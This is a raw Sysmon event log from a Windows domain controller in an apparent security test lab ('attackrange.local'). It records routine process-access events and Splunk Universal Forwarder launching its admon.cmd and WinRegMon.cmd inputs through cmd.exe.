13:09:50.212{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-429E-6000-7100-000000009A01}3820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429E-6000-7100-000000009A01}3820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.214{08A6967A-429E-6000-7100-000000009A01}3820C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429E-6000-7000-000000009A01}3884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429E-6000-7000-000000009A01}3884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.103{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429E-6000-7000-000000009A01}3884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.105{08A6967A-429E-6000-7000-000000009A01}3884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.995{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429D-6000-6F00-000000009A01}2468C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 